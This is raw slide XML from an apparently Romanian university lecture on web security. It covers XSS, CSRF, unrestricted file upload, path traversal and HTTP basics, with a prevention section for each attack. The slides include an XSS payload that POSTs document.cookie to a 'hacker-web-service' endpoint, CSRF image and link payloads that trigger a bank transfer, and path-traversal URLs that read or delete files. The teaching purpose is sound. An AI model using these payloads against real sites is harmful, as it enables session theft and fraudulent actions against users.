            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>'&lt;script&gt;fetch("http://localhost/security/xss/hacker-web-service.php", {method: "POST", body: document.cookie, headers: {"Content-Type": "application/x-www-form-urlencoded"}})&lt;/script&gt;'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Prevenire atacuri XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p4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Ideea de baza e validari suplimentare la server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Se pot face si validari date la client (in javascript), dar serverul nu trebuie sa se bazeze pe acestea deoarece browserul este sub controlul utilizatorului si acesta poate face ce vrea cu browserul.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Validarile de la server asupra datelor introduse de utilizator, trebuie obligatoriu sa elimine taguri HTML:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ex. in PHP:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$input = htmlspecialchars($input);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$input = htmlentities($input);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Cross-Site Request Forgery (CSRF)</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 este CSRF ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p4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Vulnerabilitate care permite unui utilizator rau intentionat sa forteze un utilizator naiv sa execute actiuni malitioase (i.e. sub forma de cereri HTTP) fara a fi constient de asta, de obicei cand acest utilizator naiv este autentificat in aplicatia web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSRF este folosit impreuna cu atacuri de social engineering, phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Atacatorul poate obtine date sensibile de la utilizatorul naiv, poate obtine drepturi suplimentare (i.e. administrator) in aplicatie, poate fura date, distruge date (depinde de nivelul de acces al utilizatorului naiv)</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Exemplu CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p4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Presupunem ca esita o aplicatie web de banking si are o functionalitate care transfera din contul curent logat o suma de bani spre alt cont la URL-ul:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://localhost/security/csrf/doTransfer.php?destinatar=contatacator&amp;suma=5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Daca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>utilizatorul naiv e autentificat in alt tab al browserului in aplicatia de banking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Atacatorul trimite utilizatorului naiv un mail sau un document html care contine:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;img src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost/security/csrf/doTransfer.php?destinatar=spiderman&amp;suma=5"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&gt; sau</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;a href="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://localhost/security/csrf/doTransfer.php?destinatar=spiderman&amp;suma=5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"&gt;You won a free iPhone!&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cand utilizatorul naiv face click pe linkurile de deasupra, el va transfera bani fara sa vrea in contul atacatorului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Prevenire CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p4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Includerea in cadrul formularelor care realizeaza operatii sensibile (precum transferul bancar) de token-i suplimentari ascunsi de validare (sub forma unui input de tip hidden), token-i cu durata de viata limitata si nereutilizabili. Valoarea unui asemenea token este trimisa la submit-ul formularului impreuna cu datele propriu-zise din formular si comparata cu o valoare salvata in prealabil pe sesiune. Daca valoarea tokenului primita pe request-ul de submit al formularului coincide cu cea salvata pe sesiune, request-ul este unul legitim. Un submit al formularului de transfer bancar cu un astfel de token devine:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost/security/csrf/doTransfer.php?destinatar=spiderman&amp;suma=5&amp;token=09e8411f66114d22bd18b5fcebed2c05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Un atacator, chiar daca cunoaste pattern-ul acestui URL, nu va fi capabil sa ghiceasca un token valid, un request facut fara acest token putand fi usor invalidat pe back-end.</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Unrestricted file upload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 este UFU ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p5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Acest tip de vulnerabilitate se refera aplicatii web care permit upload de fisiere</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Daca aplicatia web nu restrictioneaza fisierele care se pot incarca, un atacator poate incarca fisiere executabile (.exe, .php, .aspx, .jsp, .py) si daca cunoaste calea unde sunt incarcate fisierele pe server, le poate apela direct din browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Atacatorul poate face orice la nivel de fisier, inclusiv sa stearga toata aplicatia sau sa afle codul sursa al aplicatiei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Wide Web (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;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WWW = spatiu de resurse interconectat construit peste reteaua Internet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Este format din 2 componente principale</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Limbajul HTML (Hypertext Markup Language)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocolul HTTP (HyperText Transfer Protocol) si HTTPS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Plus multe alte componente secundare:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cascading Style Sheets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Limbaje XML-based (eXtended Markup Language)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Limbaje de programare server-side (PHP, Node.js, Java, C#/ASP.NET</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2 actori principali: browser (Firefox, Chrome, Safari etc.) si server web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Multe servicii peste web: navigare, cautare (Google), video-conferinta (Teams), audio-video streaming (Youtube) etc.</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Prevenire UFU</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p5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Restrictionare tipuri fisiere pentru upload la server-side</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Calea (path) unde se incarca fisierele la server, nu trebuie sa fie disponibila pentru utilizatori</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Path traversal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Vulnerabilitati Path traversal </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p5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 pot afla diverse resurse de pe serverul web </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://url-aplicatie-web/../../../../*/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Se pot sterge resurse de pe serverul web:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://url-aplicatie-web/delete.php?../../somefolder/somefile</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Informatii avansate securitate web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p5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Open Web Application Security Project:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Browser Exploitation Framework Project:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://beefproject.com/</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Comunicare web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515000" y="1344900"/>
            <a:ext cx="8429625" cy="2876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HyperText Transfer Protocol (HTTP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;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Protocol standardizat de IETF (RFC 7230, 7231, 7232, 7233, 7234, 7235)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Este un protocol bazat pe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>cerere-raspuns</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Este un protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (nu mentine starea unei sesiuni) si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>asincron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (un document html este incarcat asincron de catre browser, pe masura ce parti din el devin disponibile)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Orice resursa web are o adresa: URL (Uniform Resource Locator): </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http: //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://ww.example.com/index.php?var=val#id1</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Cerere HTTP - exemplu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;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lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Get http://www.google.com HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Host: www.google.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="68750"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Accept-Language: en-us,en;q=0.5</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
